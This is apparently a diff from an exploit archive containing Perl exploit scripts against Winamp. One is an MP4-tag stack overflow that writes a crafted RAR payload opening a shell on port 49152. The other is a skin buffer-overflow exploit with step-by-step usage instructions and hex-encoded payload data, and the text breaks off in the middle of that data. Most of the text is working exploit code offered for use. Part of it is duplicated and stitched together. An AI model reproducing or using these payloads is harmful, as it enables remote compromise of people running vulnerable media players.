"\x94\x56\xB3\xE3\xAD\xA5\x3A\x25\x36\xAC\xEA\xC5\x8B\x4A\x6B".
"\x32\xF9\xD9\xFD\x2C\x2F\x6F\x48\xD9\xAF\xE8\x44\xE2\x1D\x9C".
"\x8A\x9E\x49\x57\x99\x08\x57\x95\xF9\x0C\xDA\x97\xA4\xB4\x96".
"\x4E\xCC\x63\xA8\x56\x9B\x03\xF6\x3D\xE1\xA2\x95\x20\x33\xC0".
"\x60\x54\xD7\x33\xF7\x6D\xEB\x13\xFF\x64\xC6\x94\x45\xA6\x34".
"\xD8\x23\x99\xA0\xB2\xE3\x41\x58\x16\xE9\x92\x30\xB4\xE0\x4D".
"\x26\x1C\x71\xDD\xBE\xA2\x24\xDA\x30\xA4\x51\xB5\xA8\x0C\xEE".
"\xB0\xD2\xCB\x75\x72\xC7\x70\xE8\x6F\x71\x56\xF2\xCB\xAA\xF1".
"\xD9\xF2\xC9\xA8\xDB\x4A\x78\x9A\x3D\x10\x84\x68\x7A\x63\xEC".
"\x87\xFA\x84\x63\x79\x46\xEB\xBC\xA1\x31\xC1\xE0\x3B\xA1\x2D".
"\xD7\x32\xCB\xCE\xC0\x0F\x40\x2C\x9E\x33\x3B\x4D\xF1\x91\xD7".
"\x0F\xB0\x11\xF6\xC8\x2E\x16\xE8\x1A\x47\x08\xE2\x46\xC7\x23".
"\x00\x8A\x65\xB0\x63\x61\x39\x68\x36\x47\x24\xC2\xDA\xE9\x07".
"\xFB\x80\x43\x46\x97\x40\x1B\x6A\xE0\x3A\xBC\xEE\x7B\x5A\x60".
"\x66\x4C\x10\xB7\xF3\x89\x99\x28\x13\x38\x01\x1E\x00\x65\x70".
"\x3E\x01\xA2\x9E\x8D\x52\x43\x72\x63\x5A\x0F\x1E\x96\xD5\x89".
"\xEC\x3F\x2D\xBB\x6E\x8B\x60\x9B\x09\x9F\x26\x8F\x41\x8F\x74".
"\xE7\xCA\xDE\xA6\x28\xB4\x75\x75\x2A\x31\xFC\x8C\x0F\xC9\x4A".
"\x00\x86\xCC\xDE\xB9\xBE\xD5\xC5\xE5\x02\x8E\xA1\x09\xE1\x32".
"\x7C\x74\x38\xB5\xE7\xC9\x7C\x0D\x6D\x37\xB4\xF8\x26\xD4\x7A".
"\x21\x16\x85\xC3\x97\xDE\x85\xBE\xA5\x0E\x68\x28\xAA\x02\xB5".
"\x04\xF6\x3C\x6D\x10\x3B\xDC\x6F\x58\x13\x41\x6B\x86\x05\xDC".
"\xB4\xDD\x1A\xEB\x68\x8E\x00\xE7\xC5\x66\x87\x1D\x37\x57\x09".
"\x0A\x1C\x6C\x4C\x14\x98\xF8\x69\x79\x84\xB8\xB7\x7C\x46\x93".
"\x0D\x0D\xB7\xC5\xC1\xC0\x46\x99\x36\x1A\x2C\x2C\x2E\x67\x1D".
"\x1A\x2C\x54\x56\x92\x14\x58\x16\x5A\x34\xB7\xF8\x1D\xFF\x5F".
"\x90\xEF\x25\xEB\xCD\x5C\xC0\x05\xF1\x7E\x8D\x22\x5C\x7C\x7C".
"\x4B\xF4\x58\xDD\x54\x58\x37\x70\x04\x69\x53\x58\x58\x38\x77".
"\x55\xA4\x06\x0E\x4D\x8C\x93\x07\x1B\x09\x1F\x4E\x1E\x43\xD2".
"\xEC\x9A\xDC\xA5\xBF\xC2\x44\x9A\xBE\x6E\x86\x9F\xED\xF5\xF9".
"\x0E\xB1\xEE\xF5\xFB\x1E\xF7\x67\xB5\xEF\xF6\xFE\x0E\xE7\xFE".
"\x6D\xC8\xAF\x2C\xA3\xAF\x7F\x31\xA9\xE8\xB8\x49\xE6\x7C\x54".
"\x91\x8D\x9D\x32\x9A\xE9\xD6\x66\xA7\xD2\x87\x8C\x8E\xC7\x39".
"\x4E\x5E\x55\x8F\xCA\xB7\x43\x05\x3F\x17\xCC\xB0\x96\xA2\x98".
"\xC5\x91\x42\x3A\xA1\x16\x0D\x57\x9B\x66\xF1\x6B\x95\x18\x32".
"\x57\xB8\xB4\x1D\x15\x01\xC5\x4D\xD8\x26\x41\x90\x01\x09\x6E".
"\x1F\x48\x24\x43\x84\x40\xAC\x4E\x6B\xB9\xCC\xE7\x5A\xC2\xA6".
"\xDD\xC1\x8F\x22\x55\x77\x34\x97\x93\x6B\x6C\xCE\xAE\xF6\x5C".
"\x14\xE6\x28\x0D\x15\x2E\x01\x81\xB2\x25\x6C\x51\xE1\x3B\x2E".
"\x1B\x43\xD9\x86\x5C\x25\xF4\x74\x84\x35\xBA\xC3\x77\xEC\x92".
"\xF4\x48\xD4\xE3\xA6\xD2\x38\x3A\xB3\x52\x3E\xF5\x49\x11\xA9".
"\x32\x89\xC8\xDF\x8C\xDE\x10\xC8\x73\x2C\x05\x47\xA1\xB2\x4B".
"\x0D\x5E\x59\xCF\xE9\x14\x1A\x57\x1D\x02\x7F\xD4\x97\x13\xF7".
"\x77\x70\xD6\xD7\xA1\x31\x68\xBD\x9C\x00\xC9\xFC\x75\x0B\x6F".
"\xC2\x50\x4B\xEF\x09\xAA\x09\x9C\xB8\xDB\x64\xF0\xAF\x38\x08".
"\xD9\xC1\xD3\x5D\x6B\x30\x16\xB4\x68\xC5\xC7\xD2\x2E\x4C\xAB".
"\x75\xCE\xC5\x81\x0E\xBB\x7E\x83\x2D\xC3\x35\x16\x10\xD1\x79".
"\x63\x2E\x1D\xC2\xE9\xEF\x9B\x96\x0A\x52\xF5\xA4\x35\x5C\x63".
"\xD8\xC6\x1E\x55\xEE\xF8\x7D\xDE\x0F\x09\xD4\x20\x4E\xAF\x3F".
"\x2E\xE8\xE9\x0E\x8F\x55\x13\xE4\xA9\xF1\x65\xFF\xC2\xF4\xAA".
"\xD5\x67\x66\x9C\x90\x9D\x08\x8E\xDE\x26\x46\x72\x9B\xBF\x97".
"\x18\x1E\xAA\x9F\x69\x50\x01\xFF\x10\xC4\x3D\x7B\x00\x40\x07".
"\x00";
# size = 1201 bytes
open(code, ">unrarme.rar") || die "Can't Write temporary File\n";
binmode (code);
print code $rar_data;
close (code);
print "\nFile ready, have fun..\n";
# milw0rm.com [2007-12-08]
#!/bin/perl
#
# Nullsoft Winamp MP4 tags Stack Overflow
#
# 0-day discovered and exploited by SYS 49152
#
# Tested on win XP SP2 ENG
# Tuned for Nullsoft Winamp 5.32 d.i.
# Shell on port 49152
#
# usage:
# well, not much fun for you kids here ..
# to get the shell you have to use ALT+3 and press UPDATE.
# Instead this one is VERY interesting for the exploiters around..
# this is an unicode sploit where in addition about half
# of the 0x0-0xff range can't be used..
# I'm quite curious to see if someone understands how I did..
# if this is the case drop me a mail with the magic word
# to gforce(put the @ here)operamail(put the . here)com
#
# btw
# due to some complaints by some kids that were having serious
# problems in using winzip, this time I tried with winrar :-)
#
#
#update:
#the latest 5.5 seems patched.
#the winamp version 5.32 reflects the date when I last updated
#this code, 'cause I exploited this one more than an year ago.
#I see that marsu exploited the same bug about six months ago,
#when I did the big mistake to show this one to some "friends"..
#I'm sure that marsu can even give the details on how this bug works :-)
# begin binary data:
my $rar_data = # code 724983
"\x52\x61\x72\x21\x1A\x07\x00\xCF\x90\x73\x00\x00\x0D\x00\x00".
"\x00\x00\x00\x00\x00\xBF\x95\x74\x20\x80\x3C\x00\x5A\x04\x00".
"\x00\x70\x09\x00\x00\x02\x0B\x7C\xFB\x08\xB3\xB0\x24\x36\x1D".
"\x33\x1C\x00\x20\x00\x00\x00\x53\x59\x53\x5F\x34\x39\x31\x35".
"\x32\x5F\x4D\x50\x34\x5F\x66\x6F\x72\x5F\x77\x69\x6E\x61\x6D".
"\x70\x2E\x6D\x70\x34\x0C\x1D\x51\x10\x8D\x0F\xCD\x81\x1C\x8A".
"\x25\xAE\x74\x6C\x6C\x18\xC6\xDE\x86\xF5\x9C\x64\xDD\x9B\xB3".
"\x66\xF3\x93\x84\xE7\x14\xE1\xBB\x3E\x0A\x4E\x31\x1A\xDE\xC8".
"\xC4\xD9\xAD\xA7\xA4\x73\xA8\x33\xE0\xD8\x33\xE4\xF1\x98\xF4".
"\x6D\x90\x0C\x03\x03\x00\xD0\x7B\x06\x31\x8F\xE2\x44\xB5\x4E".
"\x93\x94\xE1\x22\x51\x45\x03\x0C\xCC\x30\x18\x66\x7F\x0B\x16".
"\xE0\x0D\x83\xC1\xD8\x3E\x3B\xBB\x12\x93\xF8\x0D\xAC\xC5\x79".
"\x77\xEA\xAA\xF5\x7C\x78\x5E\x7F\x35\x74\xBD\x75\x5E\x55\xF1".
"\xF5\x2F\xDE\xF5\xDD\x5D\xDD\x25\x4A\xF8\xD2\xBE\x16\x92\x04".
"\x17\xDF\xB2\xAC\xDC\xDD\x0E\x6D\x06\x62\xAD\x0C\xAC\x93\x92".
"\x0F\xCE\xAF\xCB\xA1\xCB\xFD\x19\x08\x10\x7B\x25\xA0\xBA\x9E".
"\xC5\xEF\x6B\xF1\xE9\x70\xFF\x7C\xFE\x14\x16\x3B\x81\xB6\xFB".
"\xEC\xFB\xF2\x55\xA8\x07\xDF\xA5\x57\x80\xE7\x63\x1D\x63\xFD".
"\xCC\xCF\xB3\xA5\x59\x2A\x73\xD4\x67\x67\x66\x7A\x0E\x6F\xBD".
"\xB5\x39\x9E\x25\x60\xD8\x90\x6F\x0A\x85\x56\x55\xFE\x4A\x85".
"\x6A\x3D\x08\xAB\x6F\xF8\x67\xAB\x3A\xBF\x8B\xBB\xF3\x79\xD4".
"\x66\x77\xCE\xA3\xA9\xDB\x1B\x21\x50\x08\xF5\x3D\xCA\xF2\xEF".
"\x7D\x5D\xE4\xFD\x9E\xE7\x5F\xB5\xD8\x4F\xDD\xF9\xFE\x4F\x8F".
"\xEB\x4F\xD6\x4F\x56\x08\xC6\x0A\xBA\xB0\xBB\x75\xA1\xC8\x1D".
"\xCE\xE1\x32\x77\x29\x36\x5B\xFC\x04\x58\xCD\x8B\x68\xCC\xD9".
"\x51\x8D\x08\x41\xC2\xDF\x21\xE3\xFE\x47\xB2\x0D\x75\x2C\x7E".
"\x09\xA5\x78\xD6\x95\x10\x42\x38\x56\xD5\xD6\xDF\x9F\x3B\x74".
"\x8E\x2E\x32\xD8\x42\x25\xDB\x22\x75\x96\xDB\x41\x48\x6A\xFE".
"\x94\x56\xB3\xE3\xAD\xA5\x3A\x25\x36\xAC\xEA\xC5\x8B\x4A\x6B".
"\x32\xF9\xD9\xFD\x2C\x2F\x6F\x48\xD9\xAF\xE8\x44\xE2\x1D\x9C".
"\x8A\x9E\x49\x57\x99\x08\x57\x95\xF9\x0C\xDA\x97\xA4\xB4\x96".
"\x4E\xCC\x63\xA8\x56\x9B\x03\xF6\x3D\xE1\xA2\x95\x20\x33\xC0".
"\x60\x54\xD7\x33\xF7\x6D\xEB\x13\xFF\x64\xC6\x94\x45\xA6\x34".
"\xD8\x23\x99\xA0\xB2\xE3\x41\x58\x16\xE9\x92\x30\xB4\xE0\x4D".
"\x26\x1C\x71\xDD\xBE\xA2\x24\xDA\x30\xA4\x51\xB5\xA8\x0C\xEE".
"\xB0\xD2\xCB\x75\x72\xC7\x70\xE8\x6F\x71\x56\xF2\xCB\xAA\xF1".
"\xD9\xF2\xC9\xA8\xDB\x4A\x78\x9A\x3D\x10\x84\x68\x7A\x63\xEC".
"\x87\xFA\x84\x63\x79\x46\xEB\xBC\xA1\x31\xC1\xE0\x3B\xA1\x2D".
"\xD7\x32\xCB\xCE\xC0\x0F\x40\x2C\x9E\x33\x3B\x4D\xF1\x91\xD7".
"\x0F\xB0\x11\xF6\xC8\x2E\x16\xE8\x1A\x47\x08\xE2\x46\xC7\x23".
"\x00\x8A\x65\xB0\x63\x61\x39\x68\x36\x47\x24\xC2\xDA\xE9\x07".
"\xFB\x80\x43\x46\x97\x40\x1B\x6A\xE0\x3A\xBC\xEE\x7B\x5A\x60".
"\x66\x4C\x10\xB7\xF3\x89\x99\x28\x13\x38\x01\x1E\x00\x65\x70".
"\x3E\x01\xA2\x9E\x8D\x52\x43\x72\x63\x5A\x0F\x1E\x96\xD5\x89".
"\xEC\x3F\x2D\xBB\x6E\x8B\x60\x9B\x09\x9F\x26\x8F\x41\x8F\x74".
"\xE7\xCA\xDE\xA6\x28\xB4\x75\x75\x2A\x31\xFC\x8C\x0F\xC9\x4A".
"\x00\x86\xCC\xDE\xB9\xBE\xD5\xC5\xE5\x02\x8E\xA1\x09\xE1\x32".
"\x7C\x74\x38\xB5\xE7\xC9\x7C\x0D\x6D\x37\xB4\xF8\x26\xD4\x7A".
"\x21\x16\x85\xC3\x97\xDE\x85\xBE\xA5\x0E\x68\x28\xAA\x02\xB5".
"\x04\xF6\x3C\x6D\x10\x3B\xDC\x6F\x58\x13\x41\x6B\x86\x05\xDC".
"\xB4\xDD\x1A\xEB\x68\x8E\x00\xE7\xC5\x66\x87\x1D\x37\x57\x09".
"\x0A\x1C\x6C\x4C\x14\x98\xF8\x69\x79\x84\xB8\xB7\x7C\x46\x93".
"\x0D\x0D\xB7\xC5\xC1\xC0\x46\x99\x36\x1A\x2C\x2C\x2E\x67\x1D".
"\x1A\x2C\x54\x56\x92\x14\x58\x16\x5A\x34\xB7\xF8\x1D\xFF\x5F".
"\x90\xEF\x25\xEB\xCD\x5C\xC0\x05\xF1\x7E\x8D\x22\x5C\x7C\x7C".
"\x4B\xF4\x58\xDD\x54\x58\x37\x70\x04\x69\x53\x58\x58\x38\x77".
"\x55\xA4\x06\x0E\x4D\x8C\x93\x07\x1B\x09\x1F\x4E\x1E\x43\xD2".
"\xEC\x9A\xDC\xA5\xBF\xC2\x44\x9A\xBE\x6E\x86\x9F\xED\xF5\xF9".
"\x0E\xB1\xEE\xF5\xFB\x1E\xF7\x67\xB5\xEF\xF6\xFE\x0E\xE7\xFE".
"\x6D\xC8\xAF\x2C\xA3\xAF\x7F\x31\xA9\xE8\xB8\x49\xE6\x7C\x54".
"\x91\x8D\x9D\x32\x9A\xE9\xD6\x66\xA7\xD2\x87\x8C\x8E\xC7\x39".
"\x4E\x5E\x55\x8F\xCA\xB7\x43\x05\x3F\x17\xCC\xB0\x96\xA2\x98".
"\xC5\x91\x42\x3A\xA1\x16\x0D\x57\x9B\x66\xF1\x6B\x95\x18\x32".
"\x57\xB8\xB4\x1D\x15\x01\xC5\x4D\xD8\x26\x41\x90\x01\x09\x6E".
"\x1F\x48\x24\x43\x84\x40\xAC\x4E\x6B\xB9\xCC\xE7\x5A\xC2\xA6".
"\xDD\xC1\x8F\x22\x55\x77\x34\x97\x93\x6B\x6C\xCE\xAE\xF6\x5C".
"\x14\xE6\x28\x0D\x15\x2E\x01\x81\xB2\x25\x6C\x51\xE1\x3B\x2E".
"\x1B\x43\xD9\x86\x5C\x25\xF4\x74\x84\x35\xBA\xC3\x77\xEC\x92".
"\xF4\x48\xD4\xE3\xA6\xD2\x38\x3A\xB3\x52\x3E\xF5\x49\x11\xA9".
"\x32\x89\xC8\xDF\x8C\xDE\x10\xC8\x73\x2C\x05\x47\xA1\xB2\x4B".
"\x0D\x5E\x59\xCF\xE9\x14\x1A\x57\x1D\x02\x7F\xD4\x97\x13\xF7".
"\x77\x70\xD6\xD7\xA1\x31\x68\xBD\x9C\x00\xC9\xFC\x75\x0B\x6F".
"\xC2\x50\x4B\xEF\x09\xAA\x09\x9C\xB8\xDB\x64\xF0\xAF\x38\x08".
"\xD9\xC1\xD3\x5D\x6B\x30\x16\xB4\x68\xC5\xC7\xD2\x2E\x4C\xAB".
"\x75\xCE\xC5\x81\x0E\xBB\x7E\x83\x2D\xC3\x35\x16\x10\xD1\x79".
"\x63\x2E\x1D\xC2\xE9\xEF\x9B\x96\x0A\x52\xF5\xA4\x35\x5C\x63".
"\xD8\xC6\x1E\x55\xEE\xF8\x7D\xDE\x0F\x09\xD4\x20\x4E\xAF\x3F".
"\x2E\xE8\xE9\x0E\x8F\x55\x13\xE4\xA9\xF1\x65\xFF\xC2\xF4\xAA".
"\xD5\x67\x66\x9C\x90\x9D\x08\x8E\xDE\x26\x46\x72\x9B\xBF\x97".
"\x18\x1E\xAA\x9F\x69\x50\x01\xFF\x10\xC4\x3D\x7B\x00\x40\x07".
"\x00";
# size = 1201 bytes
open(code, ">unrarme.rar") || die "Can't Write temporary File\n";
binmode (code);
print code $rar_data;
close (code);
print "\nFile ready, have fun..\n";
# milw0rm.com [2007-12-08]

414
platforms/windows/local/8158.pl
View file

@ -1,207 +1,207 @@
#!/usr/bin/perl
#
# WinAmp <= 5.541 Skin Universal Buffer Overflow Exploit
#
# Discovered and Exploited by SkD (skdrat@hotmail.com)
# -----------------------------------------------------
# WinAmp = http://www.winamp.com
#
# Who doesn't use WinAmp?
#
# This was an 0day for sometime but with the release of
# the new version 5.55, it fixed the buffer overflow vuln.
# I made it universal and very reliable.
# The vulnerability is a mixture of a standard buffer overflow
# with a SEH overflow, so to make it more stable,
# both of the scenarios will be exploited accordingly when one
# is triggered with my exploit :).
# The exploit can also run any shellcode (alpha) so this makes
# it ever so useful.
#
# Instructions:-
# -Run script.
# -Copy the created exploit directory "SkD's Skin" to
# "C:\Program Files\WinAmp\Skins" OR just install it.
# -Choose the skin from WinAmp :)
#
# Enjoy it ladies and gents :)
#
# Shouts out to: -KkD
# -InTeL
# -Jayji
# -str0ke
#
# Note: Author has no responsibility over the damage done with this!
use strict;
use warnings;
my $skin_xml = "\xEF\xBB\xBF\x3C\x3F\x78\x6D\x6C\x20\x76\x65\x72\x73\x69\x6F\x6E\x3D\x22\x31\x2E\x30\x22\x20\x65\x6E\x63\x6F\x64\x69\x6E\x67\x3D".
"\x22\x55\x54\x46\x2D\x38\x22\x20\x73\x74\x61\x6E\x64\x61\x6C\x6F\x6E\x65\x3D\x22\x79\x65\x73\x22\x3F\x3E\x0D\x0A\x0D\x0A\x3C\x57".
"\x69\x6E\x61\x6D\x70\x41\x62\x73\x74\x72\x61\x63\x74\x69\x6F\x6E\x4C\x61\x79\x65\x72\x20\x76\x65\x72\x73\x69\x6F\x6E\x3D\x22\x31".
"\x2E\x33\x34\x22\x3E\x0D\x0A\x09\x3C\x73\x6B\x69\x6E\x69\x6E\x66\x6F\x3E\x0D\x0A\x09\x09\x3C\x76\x65\x72\x73\x69\x6F\x6E\x3E\x31".
"\x2E\x32\x3C\x2F\x76\x65\x72\x73\x69\x6F\x6E\x3E\x0D\x0A\x09\x09\x3C\x6E\x61\x6D\x65\x3E\x42\x65\x6E\x74\x6F\x3C\x2F\x6E\x61\x6D".
"\x65\x3E\x0D\x0A\x09\x09\x3C\x61\x75\x74\x68\x6F\x72\x3E\x53\x6B\x44\x3C\x2F\x61\x75\x74\x68\x6F\x72\x3E\x0D\x0A\x09\x09\x3C\x63".
"\x6F\x6D\x6D\x65\x6E\x74\x3E\x53\x6B\x44\x3C\x2F\x63\x6F\x6D\x6D\x65\x6E\x74\x3E\x0D\x0A\x09\x09\x3C\x65\x6D\x61\x69\x6C\x3E\x73".
"\x6B\x64\x72\x61\x74\x40\x68\x6F\x74\x6D\x61\x69\x6C\x2E\x63\x6F\x6D\x3C\x2F\x65\x6D\x61\x69\x6C\x3E\x0D\x0A\x09\x09\x3C\x73\x63".
"\x72\x65\x65\x6E\x73\x68\x6F\x74\x3E\x53\x6B\x44\x73\x68\x6F\x74\x2E\x70\x6E\x67\x3C\x2F\x73\x63\x72\x65\x65\x6E\x73\x68\x6F\x74".
"\x3E\x0D\x0A\x09\x09\x3C\x68\x6F\x6D\x65\x70\x61\x67\x65\x3E\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x53\x6B\x44\x2E\x63\x6F".
"\x6D\x2F\x3C\x2F\x68\x6F\x6D\x65\x70\x61\x67\x65\x3E\x0D\x0A\x09\x3C\x2F\x73\x6B\x69\x6E\x69\x6E\x66\x6F\x3E\x0D\x0A\x0D\x0A\x09".
"\x3C\x61\x63\x63\x65\x6C\x65\x72\x61\x74\x6F\x72\x73\x20\x73\x65\x63\x74\x69\x6F\x6E\x3D\x22\x67\x65\x6E\x65\x72\x61\x6C\x22\x3E".
"\x0D\x0A\x09\x09\x3C\x61\x63\x63\x65\x6C\x65\x72\x61\x74\x6F\x72\x20\x62\x69\x6E\x64\x3D\x22\x41\x6C\x74\x2B\x46\x22\x20\x61\x63".
"\x74\x69\x6F\x6E\x3D\x22\x4D\x45\x4E\x55\x48\x4F\x54\x4B\x45\x59\x5F\x46\x49\x4C\x45\x22\x20\x2F\x3E\x0D\x0A\x09\x09\x3C\x61\x63".
"\x63\x65\x6C\x65\x72\x61\x74\x6F\x72\x20\x62\x69\x6E\x64\x3D\x22\x41\x6C\x74\x2B\x50\x22\x20\x61\x63\x74\x69\x6F\x6E\x3D\x22\x4D".
"\x45\x4E\x55\x48\x4F\x54\x4B\x45\x59\x5F\x50\x4C\x41\x59\x22\x20\x2F\x3E\x0D\x0A\x09\x09\x3C\x61\x63\x63\x65\x6C\x65\x72\x61\x74".
"\x6F\x72\x20\x62\x69\x6E\x64\x3D\x22\x41\x6C\x74\x2B\x4F\x22\x20\x61\x63\x74\x69\x6F\x6E\x3D\x22\x4D\x45\x4E\x55\x48\x4F\x54\x4B".
"\x45\x59\x5F\x4F\x50\x54\x49\x4F\x4E\x53\x22\x20\x2F\x3E\x0D\x0A\x09\x09\x3C\x61\x63\x63\x65\x6C\x65\x72\x61\x74\x6F\x72\x20\x62".
"\x69\x6E\x64\x3D\x22\x41\x6C\x74\x2B\x49\x22\x20\x61\x63\x74\x69\x6F\x6E\x3D\x22\x4D\x45\x4E\x55\x48\x4F\x54\x4B\x45\x59\x5F\x56".
"\x49\x45\x57\x22\x20\x2F\x3E\x0D\x0A\x09\x09\x3C\x61\x63\x63\x65\x6C\x65\x72\x61\x74\x6F\x72\x20\x62\x69\x6E\x64\x3D\x22\x41\x6C".
"\x74\x2B\x48\x22\x20\x61\x63\x74\x69\x6F\x6E\x3D\x22\x4D\x45\x4E\x55\x48\x4F\x54\x4B\x45\x59\x5F\x48\x45\x4C\x50\x22\x20\x2F\x3E".
"\x0D\x0A\x09\x3C\x2F\x61\x63\x63\x65\x6C\x65\x72\x61\x74\x6F\x72\x73\x3E\x0D\x0A\x0D\x0A\x09\x3C\x61\x63\x63\x65\x6C\x65\x72\x61".
"\x74\x6F\x72\x73\x20\x73\x65\x63\x74\x69\x6F\x6E\x3D\x22\x6E\x6F\x72\x6D\x61\x6C\x22\x3E\x0D\x0A\x09\x09\x09\x3C\x61\x63\x63\x65".
"\x6C\x65\x72\x61\x74\x6F\x72\x20\x62\x69\x6E\x64\x3D\x22\x73\x70\x61\x63\x65\x22\x20\x61\x63\x74\x69\x6F\x6E\x3D\x22\x53\x48\x4F".
"\x57\x5F\x43\x55\x52\x52\x45\x4E\x54\x5F\x54\x52\x41\x43\x4B\x22\x20\x2F\x3E\x0D\x0A\x09\x3C\x2F\x61\x63\x63\x65\x6C\x65\x72\x61".
"\x74\x6F\x72\x73\x3E\x0D\x0A\x0D\x0A\x09\x3C\x21\x2D\x2D\x20\x54\x68\x69\x73\x20\x53\x6B\x69\x6E\x20\x75\x73\x65\x73\x20\x73\x68".
"\x61\x72\x65\x64\x20\x47\x72\x61\x70\x68\x69\x63\x73\x2C\x20\x58\x4D\x4C\x20\x61\x6E\x64\x20\x4D\x61\x6B\x69\x20\x66\x72\x6F\x6D".
"\x20\x27\x42\x69\x67\x20\x42\x65\x6E\x74\x6F\x27\x20\x2D\x2D\x3E\x0D\x0A\x0D\x0A\x09\x3C\x73\x63\x72\x69\x70\x74\x73\x3E\x0D\x0A".
"\x09\x09\x3C\x73\x63\x72\x69\x70\x74\x20\x66\x69\x6C\x65\x3D\x22\x73\x2E\x6D\x61\x6B\x69\x22\x20\x70\x61\x72\x61\x6D\x3D\x22\x73".
"\x6D\x61\x6C\x6C\x22\x2F\x3E\x20\x3C\x21\x2D\x2D\x20\x4D\x75\x73\x74\x20\x62\x65\x20\x6C\x6F\x61\x64\x65\x64\x20\x61\x74\x20\x66".
"\x69\x72\x73\x74\x20\x2D\x2D\x3E\x0D\x0A\x09\x3C\x2F\x73\x63\x72\x69\x70\x74\x73\x3E\x0D\x0A\x0D\x0A\x09\x3C\x69\x6E\x63\x6C\x75".
"\x64\x65\x20\x66\x69\x6C\x65\x3D\x22\x73\x2E\x6D\x61\x6B\x69\x22\x2F\x3E\x0D\x0A\x0D\x0A\x09\x3C\x73\x63\x72\x69\x70\x74\x73\x3E".
"\x0D\x0A\x09\x09\x3C\x73\x63\x72\x69\x70\x74\x20\x66\x69\x6C\x65\x3D\x22\x73\x2E\x6D\x61\x6B\x69\x22\x20\x70\x61\x72\x61\x6D\x3D".
"\x22\x31\x33\x30\x2C\x31\x38\x22\x2F\x3E\x0D\x0A\x09\x3C\x2F\x73\x63\x72\x69\x70\x74\x73\x3E\x0D\x0A\x0D\x0A\x3C\x2F\x57\x69\x6E".
"\x61\x6D\x70\x41\x62\x73\x74\x72\x61\x63\x74\x69\x6F\x6E\x4C\x61\x79\x65\x72\x3E";
my $maki_script1 = "\x46\x47\x03\x04\x17\x00\x00\x00\x27\x00\x00\x00\x71\x49\x65\x51\x87\x0D\x51\x4A\x91\xE3\xA6\xB5\x32\x35\xF3\xE7\x64\x0F\xF5\xD6".
"\xFA\x93\xB7\x49\x93\xF1\xBA\x66\xEF\xAE\x3E\x98\x7B\xC4\x0D\xE9\x0D\x84\xE7\x4A\xB0\x2C\x04\x0B\xD2\x75\xF7\xFC\xB5\x3A\x02\xB2".
"\x4D\x43\xA1\x4B\xBE\xAE\x59\x63\x75\x03\xF3\xC6\x78\x57\xC6\x87\x43\xE7\xFE\x49\x85\xF9\x09\xCC\x53\x2A\xFD\x56\x65\x36\x60\x38".
"\x1B\x46\xA7\x42\xAA\x75\xD8\x3F\x66\x67\xBF\x73\xF4\x7A\x78\xF4\xBB\xB2\xF7\x4E\x9C\xFB\xE7\x4B\xA9\xBE\xA8\x8D\x02\x0C\x37\x3A".
"\xBF\x3C\x9F\x43\x84\xF1\x86\x88\x5B\xCF\x1E\x36\xB6\x5B\x0C\x5D\xE1\x7D\x1F\x4B\xA7\x0F\x8D\x16\x59\x94\x19\x41\x99\xE1\xE3\x4E".
"\x36\xC6\xEC\x4B\x97\xCD\x78\xBC\x9C\x86\x28\xB0\xE5\x95\xBE\x45\x72\x20\x91\x41\x93\x5C\xBB\x5F\xF9\xF1\x17\xFD\x4E\x6D\x90\x60".
"\x7E\x53\x2E\x48\xB0\x04\xCC\x94\x61\x88\x56\x72\xC0\xBC\x3A\x40\x22\x6F\xD6\x4B\x8B\xA4\x10\xC8\x29\x93\x25\x47\x4D\x3E\xAA\x97".
"\xD0\xF4\xA8\x4F\x81\x7B\x0A\xF2\x2A\x45\x49\x83\xFA\xBB\xE4\x64\xF4\x81\xD9\x49\xB0\xC0\xA8\x5B\x2E\xC3\xBC\xFD\x3F\x5E\xB6\x62".
"\x5E\x37\x8D\x40\x8D\xEA\x76\x81\x4A\xB9\x1B\x77\xBE\x97\x4F\xCE\xB0\x77\x19\x4E\x99\x56\xD4\x98\x33\xC9\x6C\x27\x0D\x20\xC2\xA8".
"\xEB\x51\x2A\x4B\xBA\x7F\x5D\x4B\xC6\x5D\x4C\x71\x38\xBA\x1E\x8D\x9E\x48\x3E\x48\xB9\x60\x8D\x1F\x43\xC5\xC4\x05\x40\xC9\x08\x0F".
"\x39\xAF\x23\x4B\x80\xF3\xB8\xC4\x8F\x7E\xBB\x59\x72\x86\xAA\xEF\x0E\x31\xFA\x41\xB7\xDC\x85\xA9\x52\x5B\xCB\x4B\x44\x32\xFD\x7D".
"\x51\x37\x7C\x4E\xBF\x40\x82\xAE\x5F\x3A\xDC\x33\x15\xFA\xB9\x5A\x7D\x9A\x57\x45\xAB\xC8\x65\x57\xA6\xC6\x7C\xA9\xCD\xDD\x8E\x69".
"\x1E\x8F\xEC\x4F\x9B\x12\xF9\x44\xF9\x09\xFF\x45\x27\xCD\x64\x6B\x26\x5A\x4B\x4C\x8C\x59\xE6\xA7\x0C\xF6\x49\x3A\xE4\x05\xCB\x6D".
"\xC4\x8A\xC2\x48\xB1\x93\x49\xF0\x91\x0E\xF5\x4A\xFF\xCF\xDC\xB4\xFE\x81\xCC\x4B\x96\x1B\x72\x0F\xD5\xBE\x0F\xFF\xE1\x8C\xE2\x01".
"\x59\xB0\xD5\x11\x97\x9F\xE4\xDE\x6F\x51\x76\x0A\xBD\xF8\xF0\x80\xA5\x1B\xA6\x42\xA0\x93\x32\x36\xA0\x0C\x8D\x4A\x1B\x34\x2E\x9B".
"\x98\x6C\xFA\x40\x8B\x85\x0C\x1B\x6E\xE8\x94\x05\x71\x9B\xD5\x36\xFD\x03\xF8\x4A\x97\x95\x05\x02\xB7\xDB\x26\x7A\x10\xF2\xD5\x7F".
"\xC4\xAC\xDF\x48\xA6\xA0\x54\x51\x57\x6C\xDC\x76\x35\xA5\xBA\xB5\xB3\x05\xCB\x4D\xAD\xC1\xE6\x18\xD2\x8F\x68\x96\xC1\xFE\x29\x61".
"\xB7\xDA\x51\x4D\x91\x65\x01\xCA\x0C\x1B\x70\xDB\xF7\x14\x95\xD5\x36\xED\xE8\x45\x98\x0F\x3F\x4E\xA0\x52\x2C\xD9\x82\x4B\x3B\x9B".
"\x7A\x66\x0E\x42\x8F\xFC\x79\x41\x15\x80\x9C\x02\x99\x31\xED\xC7\x19\x53\x98\x47\x98\x63\x60\xB1\x5A\x29\x8C\xAA\x4D\xC1\xBB\xE2".
"\xF6\x84\x73\x41\xBD\xB3\xB2\xEB\x2F\x66\x55\x50\x94\x05\xC0\x73\x1F\x96\x1B\x40\x9B\x1B\x67\x24\x27\xAC\x41\x65\x12\x00\x00\x00".
